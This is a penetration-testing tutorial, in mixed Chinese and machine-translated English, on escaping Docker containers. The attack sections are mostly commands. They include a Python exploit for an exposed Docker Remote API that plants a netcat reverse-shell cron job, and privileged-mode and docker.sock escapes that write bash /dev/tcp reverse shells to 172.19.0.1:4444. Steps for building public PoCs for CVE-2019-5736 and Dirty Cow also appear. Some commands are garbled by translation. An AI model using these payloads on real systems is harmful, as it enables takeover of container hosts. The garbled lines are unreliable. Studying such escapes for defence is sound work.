Docker 逃逸相关总结

1 Docker 核心技术

Docker is an open source application container engine that allows developers to package any application and dependencies into containers, and then publish them to any popular Linux machine, perfectly solving some inconsistencies between the test environment and the production environment. Compared with traditional virtualization technology, Docker containers directly use the host kernel, and there is no hardware virtualization, which is much lighter.

Since its appearance, Docker has been often compared with virtual machines. Some people even think that Docker is a virtual machine. In general, virtual machines use Hypervisor to virtualize memory, CPU, etc.

Let's look at a picture: we regard the rectangles in the picture as a computer, and the circles inside are as processes after processes, they use the same computer resources and can be seen from each other.

What has Docker done? Docker adds a shell to them to isolate them, and at this time they cannot see each other, but they still run on the environment just now, using the same resources as they just now. We can understand that the difference between them and before they are shelled is that they cannot communicate with each other. It should be said that we can regard this shell as a one-way door, which can move inside the outside, but cannot move outside the inside. What this means in a computer is that external processes can see internal processes, but internal processes cannot see external processes.

1.1 namespace

Namespaces are a method provided by Linux to separate resources such as process trees, network interfaces, mount points, and inter-process communication. They are kernel-level environmental isolation. In actual operation, the state or resources between multiple services will affect each other. Each service can see the processes of other services and can also access any files on the host machine. The purpose of docker is that different services on the same machine can achieve完全隔离, just like running on multiple different machines. For this, you need to specify namespaces when creating the process.

Linux's namespace mechanism provides the following seven different namespaces, including CLONE_NEWCGROUP, CLONE_NEWIPC, CLONE_NEWNET, CLONE_NEWNS, CLONE_NEWPID, CLONE_NEWUSER, and CLONE_NEWUTS. Through these seven options, we can set the resources on which new processes should be isolated from the host machine when creating new processes.

From the above, we can see that Docker does not use any virtualization technology, it is an isolation technology. If you are familiar with Linux commands, you can even understand that Docker is a high-level chroot.

1.2 docker 安全机制

Because Docker uses isolation technology, it still uses the host's kernel, CPU, and memory. Will that bring about some security problems? The answer is yes, so how does Docker protect?

There are many security mechanisms for Docker: Linux Capability, AppArmor, SELinux, Seccomp, etc. This article mainly talks about Linux Capability

Because Docker does not isolate the User Namespace by default, when viewing /etc/passwd inside Docker, you can see that the uid is 0, that is, the root inside Docker is the root of the host. But if you use some commands, like iptables -L, it will prompt you that the permissions are insufficient.

This is implemented by the Linux Capability mechanism. Since the Linux kernel version 2.1, the concept of Capability has been introduced, which breaks the concept of super user/ordinary user in the operating system, and ordinary users can also do operations that only super users can complete.

There are 38 types of Linux Capability, which correspond to some system calls. Docker is only enabled by default. This avoids many safety issues. Those who are familiar with Docker operations should be able to realize that when opening Docker, you can add a parameter that is --privileged=true, which is equivalent to turning on all Capabilities. Use docker inspect {container.id} to see the added capability in the CapAadd item.

2 判断是否在 Docker 容器中

First of all, we need to determine whether there are two commonly used detection methods in the Docker environment:

Check if the /.dockerenv file exists

Check whether /proc/1/cgroup contains strings such as Docker.

At present, these two detection methods are relatively effective. Other detection methods, such as detecting mount, fdisk -l to view hard disk, and judging the process name of PID 1, etc. can also be used to assist in judgment.

3 配置不当引发 Docker 逃逸

3.1 Docker Remote API 未授权访问

Vulnerability Brief Description: Docker Remote API can execute Docker commands, and the Docker daemon listens at 0.0.0.0, and you can directly call the API to operate Docker.

The method is to start a container at will and mount the host's /etc directory into the container, so that we can read and write files at will. We can write commands to crontab configuration file to bounce the shell.

EXP:

1

2

3

4

import docker

client=docker.DockerClient(base_url='http://your-ip:2375/')

data=client.containers.run('alpine:latest', r'''sh -c 'echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' /tmp/etc/crontab' ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

3.2 docker.sock 挂载到容器内部

Scenario description: Simply put, docker in docker, call and execute the host docker in the docker container, mount the docker file and docker.sock file of the docker host into the container, specifically:

1

2

3

4

5

docker run --rm -it \

-v /var/run/docker.sock:/var/run/docker.sock \

-v /usr/bin/docker:/usr/bin/docker \

ubuntu \

/bin/bash

Vulnerability recurrence:

Find docker.sock in the container

1

2

root@95a280bc5a19:/# find/-name docker.sock

/run/docker.sock

View host docker information in the container:

1

docker -H unix:///var/run/docker.sock info

Run a new container and mount the host root path:

1

docker -H unix:///var/run/docker.sock run -it -v /:/test ubuntu /bin/bash

In the /test directory of the new container, you can access all the resources of the host. The next step is to write the SSH key or write the scheduled task to obtain the shell.

3.3 Docker 高危启动参数

There are some relatively high-risk startup commands in Docker, which give containers greater permissions and allow some privileged operations to be performed. Under certain conditions, the container can escape.

1

2

3

4

5

6

7

8

9

docker run --rm -it

--privileged

-v /:/soft

--cap-add=SYS_ADMIN

--net=host

--pid=host

--ipc=host

ubuntu

/bin/bash

特权模式 –privileged

When using the privileged mode to start a container, the docker administrator can mount the external host disk device into the container through the mount command to obtain file read and write permissions to the entire host. In addition, commands can be executed on the host by writing scheduled tasks, etc.

Run a container through privileged mode:

1

docker run -itd --privileged ubuntu:latest /bin/bash

In the container, view the disk file:

1

fdisk -l

Mount /dev/sda1 to the new directory

1

2

mkdir /test

mount /dev/sda1 /test

Write scheduled tasks to the host machine

1

echo '* * * * * /bin/bash -i /dev/tcp/172.19.0.1/4444 01' /test/var/spool/cron/crotabs/root

3.4 Docker 软件设计引起的逃逸

3.4.1 CVE-2019-5736

CVE-2019-5736 is the CVE vulnerability number of runC. RunC was originally developed as part of Docker, and later it was extracted as a separate open source tool and library. During the operation of the entire docker architecture, Containerd provides docker with an API to run containers, and the two interact through grpc. containerd Finally, runc is used to actually run the container.

影响版本docker version=18.09.2

RunC version=1.0-rc6

利用条件：The attacker can control the image, further control the generated container

The attacker has write permissions for an existing container and can be entered through docker exec

漏洞复现：Download and install the test environment mirror

1

curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh bash install.sh

Download POC, modify the script, and compile it

1

2

3

4

5

6

7

8

9

10

11

12

# Download poc

git clone https://github.com/Frichetteten/CVE-2019-5736-PoC

# Modify Payload

vi main.go

payload='#!/bin/bash \n bash -i /dev/tcp/172.19.0.1/4444 01'

# Compile and generate payload

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

# Copy to docker container

docker cp ./main 248f8b7d3c45:/tmp

Execute payload in the container:

1

2

3

4

5

root@d1b112ea4a5e:/tmp# ./main

[+] Overwritten /bin/sh successfully

[+] Found the PID: 16

[+] Successfully got the file handle

[+] Successfully got write handle {0xc8201231e0}

Suppose that the administrator enters the container via exec, triggering the Payload.

1

docker exec -it cafa20cfb0f9 /bin/sh

Listen to the local port on 172.19.0.1 and successfully obtain the shell that the host rebounded.

3.4.2 CVE-2019-14271

https://xz.aliyun.com/t/6806

3.5 内核漏洞

Dirty Cow (CVE-2016-5195) is a permission escalation vulnerability in the Linux kernel. Through it, it can enable Docker container escape and obtain root permissions shell.

Environmental preparation:

docker shares the kernel with the host, so we need a host image with dirtyCow vulnerability.

Add container to download and run:

1

2

3

git clone https://github.com/gebl/dirtycow-docker-vdso.git

cd dirtycow-docker-vdso/

sudo docker-compose run dirtycow /bin/bash

**Availability: **Enter the container, compile the POC and execute it

1

2

3

cd /dirtycow-vdso/

Make

./0xdeadbeef 172.19.0.1:4444

Listen to the local port on 172.19.0.1 and successfully receives the shell rebounded by the host.